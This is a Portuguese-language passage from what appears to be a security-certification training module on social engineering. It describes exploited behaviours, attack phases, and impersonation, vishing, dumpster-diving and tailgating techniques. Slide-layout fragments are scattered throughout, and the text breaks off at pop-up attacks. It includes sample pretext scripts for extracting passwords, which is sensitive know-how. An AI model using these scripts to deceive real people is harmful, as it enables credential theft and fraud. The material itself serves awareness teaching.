A engenharia social não parece ser uma ameaça séria, mas pode levar a perdas substanciais para as
organizações. O impacto do ataque de engenharia social nas organizações inclui:
ÿ Perdas econômicas: os concorrentes podem usar técnicas de engenharia social para roubar informações
confidenciais, como planos de desenvolvimento e estratégias de marketing da empresa-alvo, o que
pode resultar em perdas econômicas.
ÿ Danos ao Goodwill: Para uma organização, o goodwill é importante para atrair clientes. Os ataques de
engenharia social podem prejudicar essa boa vontade ao vazar dados organizacionais confidenciais.
ÿ Perda de privacidade: a privacidade é uma grande preocupação, especialmente para grandes

organizações. Se uma organização for incapaz de manter a privacidade de suas partes interessadas
ou clientes, as pessoas podem perder a confiança na empresa e interromper sua associação comercial
com a organização. Consequentemente, a organização pode enfrentar perdas.
ÿ Perigos do terrorismo: o terrorismo e os elementos antissociais representam uma ameaça aos ativos
de uma organização — pessoas e propriedades. Os terroristas podem usar técnicas de engenharia
social para fazer projetos de seus alvos para se infiltrar em seus alvos.
ÿ Ações judiciais e arbitragem: Ações judiciais e arbitragem resultam em publicidade negativa para um
organização e afeta o desempenho do negócio.
ÿ Encerramento Temporário ou Permanente: Ataques de engenharia social podem resultar em perda de

credibilidade. Ações judiciais e arbitragem podem forçar o fechamento temporário ou permanente de
uma organização e de suas atividades comerciais.

Comportamentos vulneráveis a ataques
Autoridade Urgência
Intimidação Familiaridade ou Gosto
Consenso ou Prova Social Confiar
Escassez Ambição
Comportamentos vulneráveis a ataques
ÿ Autoridade
Autoridade implica o direito de exercer poder em uma organização. Os invasores tiram proveito disso
apresentando-se como uma pessoa com autoridade, como um técnico ou executivo, em uma organização-
alvo para roubar dados importantes.
Por exemplo, um invasor pode ligar para um usuário e alegar estar trabalhando como administrador de rede
na organização de destino. O invasor então informa a vítima sobre um incidente de segurança na rede e pede
que ela forneça as credenciais de sua conta para proteger seus dados contra roubo. Depois de obter as
credenciais da vítima, o invasor rouba informações confidenciais da conta da vítima.
ÿ Intimidação
Intimidação refere-se a uma tentativa de intimidar uma vítima a realizar várias ações usando táticas de
intimidação. Geralmente é executado representando outra pessoa e manipulando os usuários para divulgar
informações confidenciais.
Por exemplo, um invasor pode ligar para a recepcionista do executivo com esta solicitação:
"Senhor. Tibiyani está prestes a fazer uma grande apresentação para os clientes, mas não consegue abrir
seus arquivos; parece que são corruptos. Ele me disse para ligar para você e pedir que me enviasse os
arquivos imediatamente para que ele pudesse iniciar sua palestra.”
ÿ Consenso ou Prova Social
Consenso ou prova social refere-se ao fato de que as pessoas geralmente estão dispostas a gostar de coisas
ou fazer coisas que outras pessoas gostam ou fazem.

Os invasores tiram proveito disso fazendo coisas como criar sites e postar depoimentos falsos de usuários
sobre os benefícios de determinados produtos, como antimalware (rogueware). Portanto, se os usuários
pesquisarem na Internet para baixar o rogueware, eles encontrarão esses sites e acreditarão nos
depoimentos forjados. Além disso, se os usuários baixarem o produto malicioso, os invasores podem
instalar um trojan junto com ele.
ÿ Escassez
Escassez implica o estado de ser escasso. No contexto da engenharia social, a escassez muitas vezes
implica em criar um sentimento de urgência em um processo de tomada de decisão. Devido a essa
urgência, os invasores podem controlar as informações fornecidas às vítimas e manipular o processo de
tomada de decisão.
Por exemplo, quando a Apple lança um novo produto iPhone que esgota e acaba, os invasores podem
tirar proveito dessa situação enviando um e-mail de phishing aos usuários-alvo, incentivando-os a clicar
em um link fornecido no e-mail para comprar o produto. produtos. Se os usuários clicarem neste link,
serão redirecionados para algum site malicioso controlado pelo invasor. Como resultado, o usuário pode
acabar revelando os detalhes de sua conta ou baixando alguns programas maliciosos, como trojans.
ÿ Urgência
Urgência implica encorajar as pessoas a tomarem medidas imediatas. Os invasores podem tirar proveito
disso enganando as vítimas para que executem tarefas não intencionais.
Por exemplo, o ransomware geralmente usa o princípio da urgência, o que faz com que a vítima tome
medidas urgentes dentro de um prazo. As vítimas veem o cronômetro de contagem regressiva em
execução em seus sistemas infectados e sabem que a falha em tomar a decisão necessária dentro do
prazo determinado pode resultar na perda de dados importantes.
Da mesma forma, os invasores podem enviar e-mails de phishing indicando que determinado produto
está disponível por um preço baixo e que, para comprá-lo, o usuário deve clicar no link “Compre agora”.
O usuário é enganado e clica no link para agir imediatamente. Como resultado, eles são redirecionados
para um site malicioso e acabam revelando os detalhes de sua conta ou baixando um arquivo de vírus.
ÿ Familiaridade ou Gosto
Familiaridade ou gosto implica que as pessoas são mais propensas a serem persuadidas a fazer algo
quando são solicitadas por alguém de quem gostam. Isso indica que as pessoas são mais propensas a
comprar produtos se forem anunciados por uma celebridade admirada.
Por exemplo, é mais provável que as pessoas permitam que alguém olhe por cima do ombro se gostarem
dessa pessoa ou se estiverem familiarizados com ela. Se as pessoas não gostam da pessoa, elas
reconhecem imediatamente o ataque de surf no ombro e o evitam. Da mesma forma, as pessoas
geralmente permitem que alguém as trate se gostarem dessa pessoa ou estiverem familiarizados com
ela. Em alguns casos, os engenheiros sociais usam um sorriso encantador e uma conversa doce para
enganar a outra pessoa e fazê-la gostar deles.

ÿ Confiança
Os invasores geralmente tentam construir um relacionamento de confiança com as vítimas.
Por exemplo, um invasor pode ligar para uma vítima e se apresentar como um especialista em segurança.
Então, eles podem alegar que estavam trabalhando com a empresa XYZ e notaram alguns erros incomuns enviados
pelo sistema da vítima. O invasor cria confiança usando o nome da empresa e sua experiência na área de segurança.
Após estabelecer a confiança, o invasor orienta a vítima a seguir uma série de etapas para “visualizar e desativar os
erros do sistema”. Posteriormente, eles enviam um e-mail contendo um arquivo malicioso e convencem a vítima a
clicar e fazer o download. Por meio desse processo, o invasor instala com êxito o malware no sistema da vítima,
infectando-o e permitindo que o invasor roube informações importantes.
ÿ Ganância
Algumas pessoas são possessivas por natureza e buscam adquirir grandes quantidades de riqueza por meio de
atividades ilegais. Os engenheiros sociais atraem seus alvos para divulgar informações prometendo algo de graça
(apelando para sua ganância).
Por exemplo, um invasor pode fingir ser um concorrente e induzir os funcionários do alvo a revelar informações
críticas, oferecendo uma recompensa considerável.

Fatores que Tornam as Empresas Vulneráveis a

Ataques
Treinamento de segurança
insuficiente
1 2 Acesso não regulamentado
à informação
3
4
Várias unidades organizacionais Falta de políticas de
segurança
Fatores que tornam as empresas vulneráveis a ataques
Muitos fatores tornam as empresas vulneráveis a ataques de engenharia social; alguns deles são os seguintes:
ÿ Treinamento de segurança insuficiente: os funcionários podem ignorar os truques de engenharia social

usados pelos invasores para induzi-los a divulgar dados confidenciais sobre a organização. Portanto, a
responsabilidade mínima de qualquer organização é educar seus funcionários sobre as técnicas de
engenharia social e as ameaças associadas a elas para evitar ataques de engenharia social.
ÿ Acesso não regulamentado à informação: Para qualquer empresa, um de seus principais ativos é seu
banco de dados. Fornecer acesso ilimitado ou permitir que todos acessem esses dados confidenciais pode
causar problemas. Portanto, as empresas devem garantir o treinamento adequado e a vigilância do pessoal-
chave que acessa dados confidenciais.
ÿ Várias Unidades Organizacionais: Algumas organizações possuem suas unidades em diferentes

localizações geográficas, dificultando a gestão do sistema. Além disso, esse tipo de configuração facilita o
acesso de um invasor às informações confidenciais da organização.
ÿ Falta de Políticas de Segurança: A política de segurança é a base da infra-estrutura de segurança. É um

documento de alto nível que descreve os controles de segurança implementados em uma empresa. Uma
organização deve tomar medidas extremas relacionadas a todas as possíveis ameaças ou vulnerabilidades
à segurança. A implementação de certas medidas de segurança, como política de alteração de senha,
política de compartilhamento de informações, privilégios de acesso, identificação exclusiva do usuário e
segurança centralizada, provou ser benéfica.

Por que a Engenharia Social é eficaz?

ÿ A engenharia social não lida com questões de segurança de rede; em vez disso, lida com o psicológico
manipulação de um ser humano para extrair informações desejadas
01 As políticas de segurança são tão fortes quanto seu elo mais

fraco, e o comportamento humano é o fator mais suscetível
02 É difícil detectar tentativas de engenharia social
Não há método que possa ser aplicado para garantir

03 segurança completa contra ataques de engenharia social
Não há software ou hardware específico para se defender contra um

ataque de engenharia social
04
Por que a Engenharia Social é eficaz?
Como outras técnicas, a engenharia social não lida com questões de segurança de rede; em vez disso, trata da
manipulação psicológica de um ser humano para extrair informações desejadas.
A seguir estão as razões pelas quais a engenharia social continua a ser eficaz:
ÿ Apesar de várias políticas de segurança, impedir a engenharia social é um desafio porque

os seres humanos são mais suscetíveis à variação.
ÿ
É um desafio detectar tentativas de engenharia social. A engenharia social é a arte e a ciência de manipular
as pessoas para divulgar informações.
ÿ Nenhum método garante segurança completa contra ataques de engenharia social.
ÿ Nenhum hardware ou software específico está disponível para proteção contra engenharia social
ataques.
ÿ Essa abordagem é relativamente barata (ou gratuita) e fácil de implementar.
ÿ As pessoas acreditam na tecnologia usada para proteger os ativos de TI.
ÿ Informações publicamente disponíveis na Internet ou informações coletadas por meio de inteligência de código
aberto permitem o planejamento de ataques de engenharia social bem-sucedidos.

Fases de um ataque de engenharia social
Pesquise o Mergulho em lixeiras, sites, funcionários, tour pela empresa,

Empresa-alvo etc.
Identificar funcionários frustrados do alvo

Selecione um alvo
empresa
Desenvolva um Desenvolver um relacionamento com os funcionários

Relação selecionados
explorar o Colete contas confidenciais e financeiras
Relação informações, bem como as tecnologias atuais
Fases de um ataque de engenharia social
Os invasores seguem as seguintes etapas para executar um ataque de engenharia social bem-sucedido:
ÿ Pesquise a Empresa Alvo
Antes de atacar a rede da organização alvo, um invasor coleta informações suficientes para se infiltrar no
sistema. A engenharia social é uma técnica que ajuda na extração de informações. Inicialmente, o invasor
pesquisa informações básicas sobre a organização-alvo, como a natureza do negócio, sua localização, número
de funcionários e outros fatos. Enquanto pesquisa, o invasor se entrega a atividades como mergulhar em
lixeiras, navegar no site da empresa e encontrar detalhes de funcionários.
ÿ Selecione um alvo
Depois de terminar a pesquisa, o invasor seleciona um alvo para extrair informações confidenciais sobre a
organização. Normalmente, os invasores tentam alcançar funcionários insatisfeitos porque são mais fáceis de
manipular.
ÿ Desenvolver um Relacionamento
Depois que o alvo é definido, o invasor cria um relacionamento com esse funcionário para realizar sua tarefa.
ÿ Explorar o Relacionamento
O invasor explora o relacionamento e extrai informações confidenciais sobre as contas da organização,

informações financeiras, tecnologias em uso e planos futuros.

Fluxo do módulo
01 03
e suas Fases
04
Discutir técnicas de engenharia social

Os invasores implementam várias técnicas de engenharia social para coletar informações confidenciais
de pessoas ou organizações que podem ajudá-los a cometer fraudes ou participar de outras atividades
criminosas.
Esta seção trata de várias técnicas de engenharia social baseadas em humanos, computadores e
dispositivos móveis, codificadas com exemplos para uma melhor compreensão.

Tipos de Engenharia Social
Social baseado em humanos baseado em computador Social baseada em dispositivos móveis
Engenharia Engenharia social Engenharia
ÿ “Informações sensíveis são ÿ “Informações sensíveis são ÿ “Informações sensíveis são

reunidos pela interação ”. coletados com a ajuda de coletados com a ajuda de
computadores”. aplicativos móveis”.
ÿ Técnicas:
ÿ Representação ÿ Técnicas: ÿ Técnicas:
ÿ Vishing
ÿ Phishing ÿ Publicação de aplicativos maliciosos
ÿ Espionagem
ÿ Ataques de janela pop-up ÿ Usando Aplicativos de Segurança Falsos
ÿ Surf de ombro
ÿ Mergulho no Lixão ÿ Correio Spam ÿ Reempacotando aplicativos legítimos
ÿ Engenharia Social Reversa

ÿ Mensageiro de Chat Instantâneo ÿ SMiShing (SMS Phishing)
ÿ Pegando carona
ÿ Espantalho
ÿ Utilização não autorizada
Tipos de Engenharia Social
Em um ataque de engenharia social, o invasor usa suas habilidades sociais para induzir a vítima a divulgar
informações pessoais, como números de cartão de crédito, números de contas bancárias e números de
telefone ou informações confidenciais sobre sua organização ou sistema de computador. Os invasores usam
esses dados para lançar um ataque ou cometer fraudes. Os ataques de engenharia social são categorizados
em três categorias: baseados em humanos, baseados em computador e baseados em dispositivos móveis.
ÿ Engenharia Social Humana
A engenharia social baseada em humanos envolve interação humana. Agindo como se fosse uma
pessoa legítima, o invasor interage com o funcionário da organização-alvo para coletar informações
confidenciais, como planos de negócios e redes, que podem ajudá-lo a iniciar o ataque. Por exemplo,
representando um técnico de suporte de TI, o invasor pode acessar facilmente a sala do servidor.
Um invasor pode executar engenharia social baseada em humanos usando as seguintes técnicas:
o Representação o Mergulho no lixo
o Vishing o Engenharia Social Reversa
o Espionagem o Pegando carona
o Surf de ombro o Utilização não autorizada
ÿ Engenharia Social Computacional
A engenharia social baseada em computador depende de computadores e sistemas de Internet para

realizar a ação visada.

As seguintes técnicas podem ser usadas para engenharia social baseada em computador:
o Phishing o Ataques de janela pop-up
o Spam mail o Scareware
o Mensageiro de bate-papo instantâneo
ÿ Engenharia Social baseada em dispositivos móveis
Os invasores usam aplicativos móveis para realizar engenharia social baseada em dispositivos móveis.
Os invasores enganam os usuários imitando aplicativos populares e criando aplicativos móveis maliciosos com
recursos atraentes e enviando-os para as principais lojas de aplicativos com o mesmo nome. Os usuários
inadvertidamente baixam o aplicativo malicioso, permitindo que o malware infecte seu dispositivo.
Listadas abaixo estão algumas técnicas que os invasores usam para realizar engenharia social baseada em
dispositivos móveis:
o Publicação de aplicativos maliciosos o Usando aplicativos de segurança falsos
o Reempacotando aplicativos legítimos o SMiShing (SMS Phishing)

humano
Social
Engenharia
Representação ÿ O invasor finge ser alguém legítimo ou uma pessoa autorizada
ÿ Os invasores podem se passar por uma pessoa legítima ou autorizada

pessoalmente ou usando um meio de comunicação , como telefone, e-mail, etc.,
para revelar informações confidenciais
Posando como um usuário final legítimo Posando como um usuário importante
O invasor fornece essa identidade e solicita O invasor se apresenta como VIP de uma empresa-
Representação as informações confidenciais alvo, cliente valioso etc.
Exemplos "Oi! Aqui é o John do Departamento "Oi! Este é o Kevin, secretário do CFO. Estou trabalhando
de Finanças. Eu esqueci minha senha. em um projeto urgente e perdi a senha do meu sistema.
Posso pegar? Você pode me ajudar?"
Engenharia social baseada em humanos (continuação)
Personificação (Vishing)
ÿ Uma técnica de representação na qual o invasor engana os indivíduos para

revelar informações pessoais e financeiras usando tecnologia de voz ,
como sistema telefônico, VoIP, etc.
Exemplo de vishing
Abusando da superutilidade dos help desks
ÿ O invasor liga para o help desk de uma empresa, finge ser alguém em posição de autoridade ou relevância e tenta
extrair informações confidenciais do suporte técnico
“Um homem liga para o help desk de uma empresa e diz que esqueceu a senha. Ele acrescenta que, se perder o prazo em um grande projeto de
publicidade, seu chefe pode demiti-lo.
O funcionário do help desk sente pena dele e redefine rapidamente a senha, dando involuntariamente ao invasor uma entrada clara na rede
corporativa.”

Engenharia Social Humana

(continua)
espionagem Surf de ombro Mergulhar na lixeira
Não autorizado Observação direta Procurando

ouvir técnicas como um tesouro
conversas ou ler olhar por cima na casa de outra pessoa
de alguém lixo
mensagens ombro para obter
informações como
Interceptação de como senhas,
áudio, vídeo ou PINs, números
escrita
de conta, etc.
comunicação
Engenharia social baseada em humanos (continuação)
Engenharia social reversa

ÿ O atacante se apresenta como uma autoridade e o alvo busca seu conselho
antes ou depois de oferecer a informação que o atacante precisa
pegando carona
ÿ Uma pessoa autorizada intencionalmente ou não permite uma
pessoa não autorizada a passar por uma porta segura, por exemplo: “Esqueci meu
crachá de identificação em casa. Por favor me ajude"
Utilização não autorizada
ÿ O invasor, usando um crachá de identificação falso, entra em uma área

segura seguindo de perto uma pessoa autorizada por uma porta que
requer acesso com chave
Engenharia Social Humana

Representação
A representação é uma técnica comum de engenharia social baseada em humanos em que um
invasor finge ser uma pessoa legítima ou autorizada. Os invasores executam ataques de
personificação pessoalmente ou usam um telefone ou outro meio de comunicação para enganar
seu alvo e induzi-lo a revelar informações. O invasor pode se passar por um mensageiro ou entregador,

zelador, empresário, cliente, técnico, ou podem se fazer passar por visitantes. Usando essa técnica, o invasor coleta informações
confidenciais examinando os terminais em busca de senhas, procurando documentos importantes nas mesas dos funcionários,
vasculhando lixeiras e usando outras táticas. O invasor pode até tentar ouvir conversas confidenciais e “surfar” para obter
informações confidenciais.
Tipos de personificação usados na engenharia social:
ÿ Posando como um usuário final legítimo
ÿ Posando como um usuário importante
ÿ Posando como um agente de suporte técnico
ÿ Posando como um funcionário interno, cliente ou fornecedor
ÿ Fazendo-se passar por reparador
ÿ Abusar do excesso de prestimosidade do help desk
ÿ Fazer-se passar por pessoa com autorização de terceiros
ÿ Posando como um agente de suporte técnico através de vishing
ÿ Posando como uma autoridade confiável
Alguns truques de representação que um invasor executa para coletar informações confidenciais sobre a organização de destino
exploram a natureza humana de confiança, medo e obrigação moral.
ÿ Posando como um usuário final legítimo
Um invasor pode se passar por um funcionário e, em seguida, recorrer a métodos desviantes para obter acesso a dados
privilegiados. Eles podem fornecer uma identidade falsa para obter informações confidenciais.
Outro exemplo é quando um “amigo” de um funcionário pede que ele recupere informações que um funcionário acamado
supostamente precisa. Existe uma regra bem reconhecida na interação social de que um favor gera um favor, mesmo que
o “favor” original seja oferecido sem um pedido do destinatário. Isso é conhecido como reciprocidade. Os ambientes
corporativos lidam diariamente com a reciprocidade. Os engenheiros sociais tentam tirar proveito dessa característica
social por meio da representação.
Exemplo:
"Oi! Este é o John do departamento financeiro. Eu esqueci minha senha. Posso pegar?
ÿ Posando como um usuário importante
Outro fator comportamental que auxilia um engenheiro social é o hábito das pessoas de não questionar a autoridade.
Muitas vezes, as pessoas se esforçam por aqueles que consideram ter autoridade. Um invasor que se faz passar por um
indivíduo importante — como um vice-presidente ou diretor — muitas vezes pode manipular um funcionário despreparado.
Os invasores que levam a representação a um nível mais alto, assumindo a identidade de um funcionário importante,
adicionam um elemento de intimidação. O fator de reciprocidade também desempenha um papel neste cenário

onde funcionários de nível inferior podem sair de seu caminho para ajudar uma autoridade superior. Por exemplo,
é menos provável que um funcionário de suporte técnico recuse uma solicitação de um vice-presidente que está
com pouco tempo e precisa de algumas informações vitais para uma reunião.
Caso um funcionário se recuse a divulgar informações, os engenheiros sociais podem usar sua autoridade para
intimidá-los e podem até mesmo ameaçar relatar a má conduta do funcionário a seus supervisores. Essa técnica
assume maior importância quando o invasor considera um desafio se safar ao se passar por uma figura de
autoridade.
Exemplo:
"Oi! Este é Kevin, o secretário do CFO. Estou trabalhando em um projeto urgente e esqueci minha senha do
sistema. Você pode me ajudar?"
ÿ Posando como Agente de Suporte Técnico
Outra técnica envolve um invasor disfarçado de agente de suporte técnico, principalmente quando a vítima não
é proficiente em áreas técnicas. O invasor pode fingir ser um fornecedor de hardware, um técnico ou um
fornecedor de computadores. Uma demonstração em uma reunião de hackers teve o palestrante ligando para a
Starbucks e perguntando a seus funcionários se sua conexão de banda larga estava funcionando corretamente.
O funcionário perplexo respondeu que era o modem que estava causando problemas. O hacker, sem fornecer
nenhuma credencial, fez com que ele lesse o número do cartão de crédito da última transação. Em um cenário
corporativo, o invasor pode solicitar que os funcionários revelem suas informações de login, incluindo a senha,
para corrigir um problema inexistente.
Exemplo:
“Senhor, aqui é Mathew, suporte técnico da X Company. Ontem à noite, tivemos uma falha no sistema aqui e
estamos verificando se há dados perdidos. Você pode me dar sua identidade e senha?”
ÿ Fazendo-se passar por Funcionário Interno, Cliente ou Fornecedor
O atacante geralmente se veste com roupas de negócios ou outro uniforme adequado. Eles entram no prédio de
uma organização fingindo ser um empreiteiro, cliente, pessoal de serviço ou outra pessoa autorizada. Em
seguida, eles vagam despercebidos e procuram senhas presas em terminais, extraem dados críticos de lixeiras,
papéis que estão sobre as mesas e realizam outras coletas de informações. O invasor também pode implementar
outras técnicas de engenharia social, como navegação no ombro (observar usuários digitando credenciais de
login ou outras informações confidenciais) e espionagem (ouvir intencionalmente conversas confidenciais entre
funcionários) para coletar informações confidenciais que podem ajudar a lançar um ataque à organização.
ÿ Reparador
Técnicos de informática, eletricistas e reparadores de telefones geralmente são pessoas insuspeitas. Os

invasores podem se passar por um técnico ou reparador e entrar na organização. Eles realizam atividades
normais associadas ao dever assumido enquanto procuram senhas ocultas, informações críticas em mesas,
informações em lixeiras e outras informações úteis; eles às vezes até plantam dispositivos de espionagem em
locais ocultos.

Personificação (Vishing)
Vishing (phishing de voz ou VoIP) é uma técnica de representação na qual o invasor usa a tecnologia de Voz
sobre IP (VoIP) para induzir os indivíduos a revelar suas informações financeiras e pessoais críticas e usar as
informações para obter ganhos financeiros. O invasor usa falsificação de identificação de chamadas para
falsificar a identificação. Em muitos casos, o Vishing inclui mensagens e instruções pré-gravadas que lembram
uma instituição financeira legítima. Por meio do Vishing, o invasor engana a vítima para que forneça detalhes
da conta bancária ou do cartão de crédito para verificação de identidade por telefone.
O invasor pode enviar um SMS ou e-mail falso para a vítima, solicitando que ela ligue para a instituição
financeira para verificar o cartão de crédito ou a conta bancária. Em alguns casos, a vítima recebe uma
chamada de voz do atacante. Quando a vítima liga para o número listado na mensagem ou recebe a ligação
do invasor, ela ouve instruções gravadas que insistem em fornecer informações pessoais e financeiras como
nome, data de nascimento, CPF, números de contas bancárias, números de cartão de crédito ou credenciais
como nomes de usuário, senhas. Depois que a vítima fornece as informações, a mensagem gravada confirma
a verificação da conta da vítima.
Discutidos abaixo estão alguns truques que os invasores usam quando vishing para coletar informações confidenciais.
ÿ Abusando da Prestatividade Excessiva do Help Desk
As centrais de atendimento são frequentemente alvo de ataques de engenharia social por um motivo.
Os membros da equipe são treinados para serem úteis e geralmente fornecem informações
confidenciais, como senhas e informações de rede, sem verificar a autenticidade do chamador.
O invasor deve saber os nomes dos funcionários e ter detalhes sobre a pessoa que está tentando se
passar por eficaz. O invasor pode ligar para o help desk de uma empresa fingindo ser um funcionário
sênior para tentar extrair informações confidenciais do help desk.
Exemplo:
Um homem liga para o help desk de uma empresa e diz que esqueceu sua senha. Ele acrescenta que,
se perder o prazo em um grande projeto de publicidade, seu chefe pode demiti-lo.
O funcionário do help desk sente pena dele e redefine rapidamente a senha, permitindo
involuntariamente que o invasor entre na rede corporativa.
ÿ Autorização de Terceiros
Outra técnica popular usada por um invasor é representar a si mesmo como um agente autorizado por
alguma autoridade sênior em uma organização para obter informações em seu nome.
Por exemplo, quando um invasor sabe o nome do funcionário da organização de destino autorizado a
acessar as informações necessárias, ele o vigia para que possa acessar os dados necessários na
ausência do funcionário em questão. Nesse caso, o invasor pode abordar o help desk ou outro pessoal
da empresa alegando que o funcionário (figura de autoridade) solicitou as informações.
Mesmo que possa haver suspeita ligada à autenticidade do pedido, as pessoas tendem a ignorar isso
em favor de serem úteis no local de trabalho. As pessoas tendem a

acreditam que os outros estão sendo honestos quando fazem referência a uma pessoa importante e fornecem
as informações necessárias.
Essa técnica é eficaz, especialmente quando a autoridade está de férias ou viajando, impossibilitando a
verificação instantânea.
Exemplo:
“Oi, eu sou John, falei com o Sr. XYZ na semana passada antes de ele sair de férias e ele disse que você
poderia me fornecer as informações na ausência dele. Você poderia me ajudar?"
ÿ Suporte Técnico
Como a representação de um agente de suporte técnico acima, um invasor pode usar o vishing para fingir ser
um membro da equipe de suporte técnico do fornecedor ou contratado de software da organização de destino
para obter informações confidenciais. O invasor pode fingir solucionar um problema de rede e solicitar o ID do
usuário e a senha de um computador para detectar o problema. Acreditando que eles sejam um solucionador
de problemas, o usuário forneceria as informações necessárias.
Exemplo:
Atacante: “Oi, aqui é o Mike do suporte técnico. Algumas pessoas em seu escritório relataram uma
desaceleração no registro. Isso é verdade?"
Funcionário: “Sim, parece lento ultimamente.”
Atacante: “Bem, nós mudamos você para um novo servidor e seu serviço deve ser muito melhor agora. Se
você quiser me dar sua senha, posso verificar seu serviço.
As coisas vão melhorar de agora em diante.”
ÿ Figura de autoridade confiável
O método mais eficaz de engenharia social é se passar por uma figura de autoridade confiável.
Um invasor pode fingir ser um bombeiro, superintendente, auditor, diretor ou outra figura importante por telefone
ou pessoalmente para obter informações confidenciais do alvo.
Exemplo:
1. “Olá, sou John Brown. Estou com o auditor externo, Arthur Sanderson. Fomos solicitados pela empresa para
fazer uma inspeção surpresa de seus procedimentos de recuperação de desastres. Seu departamento tem
10 minutos para me mostrar como você se recuperaria de uma falha no site.”
2. “Oi, sou Sharon, uma representante de vendas do escritório de Nova York. Sei que é um prazo curto, mas
tenho um grupo de clientes em potencial no carro e há meses venho tentando fazer com que eles
terceirizassem suas necessidades de treinamento de segurança para nós.
Eles estão localizados a apenas alguns quilômetros de distância, e acho que se eu puder dar a eles um
rápido passeio por nossas instalações, seria o suficiente para empurrá-los além do limite e fazê-los assinar
acima.

Ah, sim, eles estão particularmente interessados nas precauções de segurança que adotamos. Parece
que alguém invadiu o site deles há algum tempo, e esse é um dos motivos pelos quais eles estão
considerando nossa empresa.”
3. “Olá, trabalho com a Aircon Express Services. Recebemos uma ligação informando que a sala do
computador está esquentando muito, então preciso verificar seu sistema HVAC.” O uso de termos que
soam profissionais como HVAC (Aquecimento, Ventilação e Ar Condicionado) pode adicionar
credibilidade suficiente ao disfarce de um intruso para permitir que ele acesse o recurso protegido
visado.
espionagem
Espionagem refere-se a uma pessoa não autorizada ouvindo uma conversa ou lendo as mensagens de outras
pessoas. Inclui a interceptação de qualquer forma de comunicação, incluindo áudio, vídeo ou escrita, utilizando
canais como linhas telefônicas, e-mail e mensagens instantâneas. Um invasor pode obter informações confidenciais,
como senhas, planos de negócios, números de telefone e endereços.
Surf de ombro
Shoulder surfing é a técnica de olhar por cima do ombro de alguém enquanto ele digita informações em um
dispositivo. Os invasores usam navegação de ombros para descobrir senhas, números de identificação pessoal,
números de contas e outras informações. Às vezes, eles até usam binóculos e outros dispositivos ópticos ou
instalam pequenas câmeras para gravar as ações realizadas no sistema da vítima para obter detalhes de login e
outras informações confidenciais.
Mergulhar na lixeira
O mergulho no lixo é o processo de recuperação de informações pessoais ou organizacionais confidenciais,

pesquisando em lixeiras. Os invasores podem extrair dados confidenciais, como IDs de usuário, senhas, números
de apólices, diagramas de rede, números de contas, extratos bancários, dados salariais, código-fonte, previsões de
vendas, códigos de acesso, listas telefônicas, números de cartão de crédito, calendários e organogramas em papel
ou disco. Os invasores podem usar essas informações para realizar várias atividades maliciosas. Às vezes, os
invasores até usam pretextos para apoiar suas iniciativas de mergulho no lixo, como se passar por um reparador,
técnico, faxineiro ou outro trabalhador legítimo.
As informações que os invasores podem obter pesquisando nas lixeiras incluem:
ÿ Listas telefônicas: Divulgar nomes e números de contato dos funcionários.
ÿ Organogramas: Divulgam detalhes sobre a estrutura da empresa, infraestrutura física, salas de servidores,
áreas restritas e outros dados organizacionais.
ÿ Impressões de e-mail, notas, faxes e memorandos: Revele detalhes pessoais de um funcionário, senhas,
contatos, operações internas de trabalho, certas instruções úteis e outros dados.
ÿ Manuais de política: Revelam informações sobre emprego, uso do sistema e operações.
ÿ Notas de eventos, calendários ou logs de uso do computador: revelam informações sobre os horários de
logon e logoff do usuário, o que ajuda o invasor a decidir o melhor momento para planejar o ataque.

Engenharia social reversa
Geralmente, a engenharia social reversa é difícil de realizar. Isso ocorre principalmente porque sua execução requer
muito preparo e habilidade. Na engenharia social reversa, um perpetrador assume o papel de um profissional
experiente para que os funcionários da organização solicitem informações. O invasor geralmente manipula as
perguntas para extrair as informações necessárias.
Primeiro, o engenheiro social causará um incidente, criando um problema, e depois se apresentará como o
solucionador de problemas por meio de uma conversa geral, incentivando os funcionários a fazerem perguntas.
Por exemplo, um funcionário pode perguntar como esse problema afetou arquivos, servidores ou equipamentos.
Isso fornece informações pertinentes ao engenheiro social. Muitas habilidades e experiências diferentes são
necessárias para realizar essa tática com sucesso.
Abaixo estão algumas das técnicas envolvidas na engenharia social reversa:
ÿ Sabotagem: assim que o invasor obtém acesso, ele corrompe a estação de trabalho ou faz com que ela
pareça corrompida. Nessas circunstâncias, os usuários buscam ajuda quando enfrentam problemas.
ÿ Marketing: Para garantir que o usuário ligue para o invasor, o invasor deve anunciar. O invasor pode fazer
isso deixando seu cartão de visita no escritório do alvo ou colocando seu número de contato na própria
mensagem de erro.
ÿ Suporte: Mesmo que o invasor já tenha adquirido as informações desejadas, ele pode continuar auxiliando
os usuários para que eles permaneçam desconhecendo a identidade do hacker.
Um bom exemplo de vírus de engenharia social reversa é o worm “My Party” . Este vírus não depende de
linhas de assunto sensacionalistas, mas faz uso de nomes inofensivos e realistas para seus anexos. Ao
usar palavras realistas, o invasor ganha a confiança do usuário, confirma a ignorância do usuário e conclui
a tarefa de coleta de informações.
pegando carona
Pegar carona geralmente implica entrar em um prédio ou área de segurança com o consentimento da pessoa
autorizada. Por exemplo, um invasor pode solicitar que uma pessoa autorizada destranque uma porta de segurança,
dizendo que esqueceu seu crachá de identificação. No interesse da cortesia comum, a pessoa autorizada permitirá
que o invasor passe pela porta.
Utilização não autorizada
A utilização não autorizada implica o acesso a um edifício ou área segura sem o consentimento da pessoa
autorizada. É o ato de seguir uma pessoa autorizada por uma entrada segura, pois um usuário educado abriria e
seguraria a porta para quem o segue. Um invasor, usando um crachá falso, pode tentar entrar na área segura
seguindo de perto uma pessoa autorizada por uma porta que requer acesso com chave. Eles então tentam entrar
na área restrita fingindo ser uma pessoa autorizada.

baseado em computador
Engenharia social
Janelas pop-up Cartas falsas Correntes

Janelas que aparecem E-mails que emitem avisos ao E-mails que oferecem brindes ,
repentinamente durante a navegação no usuário sobre novos vírus, cavalos como dinheiro e software, com a
Internet e pedir informações do de Tróia ou worms que podem condição de que o usuário encaminhe
usuário para fazer login ou entrar danificar o sistema do usuário o e-mail para um número específico
de pessoas
Engenharia social baseada em computador (continuação)
Mensageiro de bate-papo instantâneo
Coleta de informações pessoais conversando com um usuário

selecionado online para obter informações como datas de
nascimento e nomes de solteira
E-mail de spam
E-mails irrelevantes, indesejados e não solicitados que tentam coletar

informações financeiras, números de previdência social e informações
de rede
Scareware
Malware que induz os usuários de computador a visitar sites infestados

de malware ou baixar/comprar software potencialmente malicioso
Engenharia social baseada em computador
Os invasores executam engenharia social baseada em computador usando vários programas mal-
intencionados, como vírus, trojans e spyware, e aplicativos de software, como e-mail e mensagens instantâneas.

Discutidos abaixo são diferentes tipos de ataques de engenharia social baseados em computador:
ÿ Janelas pop-up
